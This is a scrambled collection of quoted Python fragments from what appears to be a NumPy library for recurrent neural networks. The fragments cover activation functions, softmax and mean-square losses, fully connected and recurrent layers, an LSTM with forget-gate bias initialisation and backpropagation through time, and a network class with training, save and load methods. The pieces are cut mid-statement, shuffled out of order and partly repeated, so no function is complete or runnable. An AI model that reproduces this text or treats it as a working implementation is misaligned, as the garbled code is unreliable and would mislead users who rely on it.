self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self,", "t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line", "two matrices is a sum of tensor products of columns and rows of", "previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t]", "None previous = None activation = None def __init__(self, shape, activation=identity()): self.shape =", "- input) class identity: def __call__(self, input): return input def d(self, input): return", "d(self, probs, train_on=None): ''' it returns 1, as the derivative is covered by", "forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None", "= np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache", "np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell']", "shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] +", "seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1]", "'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None):", "dH = next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] +=", "None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0']", "tensor ''' out = input for l in self.layers: out = l(out) return", "softmax_loss: ''' To be used in combination with sofmax ''' def __call__(self, input,", "= None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn'])", "self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]])", "out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] =", "the following line sums the gradients over the entire batch proof: Let x", "* self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is", "cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] *", "for l in self.layers: l.init() def reset(self): for l in self.layers: l.reset() def", "rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T)", "Fully Connected recursive layer ''' shape = None weights = None previous =", "it computes the softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size),", "dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t,", "np.exp(-input)) def d(self, input): return input * (1 - input) class identity: def", "t > 0 else h0 previous_cell = cells[t - 1] if t >", "dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous,", "probs, train_on=None): ''' it returns 1, as the derivative is covered by a", "not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out,", "is a sum of tensor products of columns and rows of the respected", "= np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] +", "dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2)", "None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for", "* self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t", "cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for", "outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0", "dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0, 'dCell': dc0}", "in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer ''' shape", "for t in range(0, time_steps): previous = outputs[t - 1] if t >", "self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :]", "= np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0", "dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over", ":, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]]))", "rows In other words, a product of two matrices is a sum of", "def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch,", "reset(self): self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous", "np class tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return 1", "inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights)", "* dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i", "is precisely the matrix product dW=x.T*dY where x holds x_i as its rows", "for l in range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is", "inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def", "matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :,", "+= activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]]", "* scale self.weights[-1, :] = 0 def reset(self): self.previous = None def __call__(self,", "raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1]", "dW=x.T*dY where x holds x_i as its rows and dY holds dY_i as", "section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1])", "cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct", "input_2): return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only to be", "outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]])", "def init(self, forget_bias_init=3): ''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf", "d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 -", "return input * (1 - input) class identity: def __call__(self, input): return input", "= np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers = []", "predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers()", "None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out,", "in range(0, time_steps): previous = outputs[t - 1] if t > 0 else", "cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] =", "cache0[l] is not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not", "* self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t -", "{'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer Paper can be", "input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def", "= np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) '''", "None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]])", "self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache", "reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW =", "None and cache0[l] is not None: if cache0[l]['c0'] is not None and cache0[l]['h0']", "- 1], dCell[t - 1]) if t > 0 else (c0, dc0) #", "cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape", "* self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t,", "cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape", "of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t]", "self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self,", "= shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen in the", "np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4", "self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out", "activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0]", "- np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self,", "2) ''' the following line sums the gradients over the entire batch proof:", "= forget_bias_init self.previous = None self.cell = None def reset(self): self.previous = None", "h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None,", "eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0]", "else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_", "- 1] if t > 0 else c0 inputs[t, :, -1] = 1", "respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t,", "if cache0 is not None and cache0[l] is not None: if cache0[l]['c0'] is", "return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) /", "(path,i)) class FC: ''' Fully Connected layer ''' shape = None weights =", "cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW", "respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW,", "self.num_of_layers()): if cache0 is not None and cache0[l] is not None: if cache0[l]['c0']", "cache[l] else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_])", "shape = None weights = None activation = None def reset(self): pass def", "is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0,", "c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input,", "holds dY_i as its rows In other words, a product of two matrices", "np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] =", "dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t > 0 else", "* self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3", "self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None:", "+= dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1", ":, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t]", "input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2):", "in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t", "''' Long Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf '''", "else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0", "# dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t]", "*= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 *", "2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class", "np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t])", "batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch,", "def d(self, input): return 1 - input * input class sigmoid: def __call__(self,", ":, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]]", "self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None:", "out = input for l in self.layers: out = l(out) return out def", "dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t])", "if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else", "\\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t])", "= np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch,", "3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3", "1 - input * input class sigmoid: def __call__(self, input): return 1 /", ":] = 0 def reset(self): self.previous = None def __call__(self, input_tensor): out, cache", "= input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t]", "0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :,", "dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] *", "np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1])", "self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1,", "* self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]]", "(1 - input) class identity: def __call__(self, input): return input def d(self, input):", "range(0, time_steps): previous = outputs[t - 1] if t > 0 else h0", "= None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell =", "np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t", "2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs,", "cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput", "= np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH", "0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell =", "= activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3", "is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch,", "LSTM: ''' Long Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf", "Connected recursive layer ''' shape = None weights = None previous = None", "out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps,", "dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path):", "time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1", "np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as the", "cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs']", "activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :,", "= np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]])", "+ 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act", "'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn':", "the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1,", "l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer ''' shape = None", "cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs", "= self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None,", "train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the softmax", "self.layers: out = l(out) return out def init(self): for l in self.layers: l.init()", "np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the", "t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn,", "* self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells':", "self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _", "-1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous", "dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn", "input * (1 - input) class identity: def __call__(self, input): return input def", "np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it", "(1 + np.exp(-input)) def d(self, input): return input * (1 - input) class", "c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs =", "sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input)) def d(self, input):", "input): return 1 - input * input class sigmoid: def __call__(self, input): return", "np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells", "def __call__(self, input): return 1 / (1 + np.exp(-input)) def d(self, input): return", "of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1]", "= lambda: len(self.layers) def __call__(self, input): ''' input is to be a rank", "reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def", "predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l", "holds x_i as its rows and dY holds dY_i as its rows In", "* self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire batch", ":] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return", "self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]])", "product dW=x.T*dY where x holds x_i as its rows and dY holds dY_i", "activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] *", "= np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]])", "(c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t]", "is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out)", "0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t,", "rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers)", "self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l]", "out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch,", "in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1]", "self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]])", "cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] =", "= previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws':", "dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache", "c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW =", "cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out", "+ self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2", "= cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape)", "= 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws':", "2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2 *", "- activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following line sums", "input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn'])", "as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] +", "= outputs[t - 1] if t > 0 else h0 previous_cell = cells[t", "the derivative is covered by a previous call to softmax_loss function ''' return", "found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous = None", "previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. /", "cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_", "None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t", "dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn", "batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None:", "dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t -", "have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus", "dH[t - 1] if t > 0 else dh0 dh += dInput[t, :,", "eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] +", "np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs", "dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t", "be used in combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size),", "self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps,", "def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i,", "in self.layers: l.init() def reset(self): for l in self.layers: l.reset() def add(self, layer_):", "= inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs}", "activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following line sums the", "t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0)", "None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] *", "h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs =", "= None weights = None activation = None def reset(self): pass def __init__(self,", "entire batch proof: Let x be a single input and dY a single", "d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only", "batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])", ":, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous =", "+ 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] =", "None cell = None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3):", "dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0,", "outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs", "num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): '''", "dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t", "activation = None def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation", "scale self.weights[-1, :] = 0 def reset(self): self.previous = None def __call__(self, input_tensor):", "= input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch,", "* self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init", "lambda: len(self.layers) def __call__(self, input): ''' input is to be a rank 3", "= input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t])", "1] if t > 0 else h0 inputs[t, :, -1] = 1 inputs[t,", "batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for", "+= np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh =", "self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ =", "input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the", "cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act,", "input class sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input)) def", "activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0]", "{'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut,", "np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t,", "= inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in", "self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 *", "it returns 1, as the derivative is covered by a previous call to", "self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch,", "inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:,", "out def init(self): for l in self.layers: l.init() def reset(self): for l in", "cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells']", "- activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t,", "columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t]", "shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen in the paper", "to be a rank 3 tensor ''' out = input for l in", "batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 *", "np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in", "by a previous call to softmax_loss function ''' return 1 class softmax_loss: '''", "self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3", "input): return input def d(self, input): return 1 class mean_square: def __call__(self, input_1,", "= { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if", "x_i as its rows and dY holds dY_i as its rows In other", "np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]])", "raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. / (1.", "inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache,", "for the dot product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i", "l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None,", "forget_bias_init=3): ''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2", "None previous = None cell = None def __init__(self, shape): self.shape = shape", "dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += 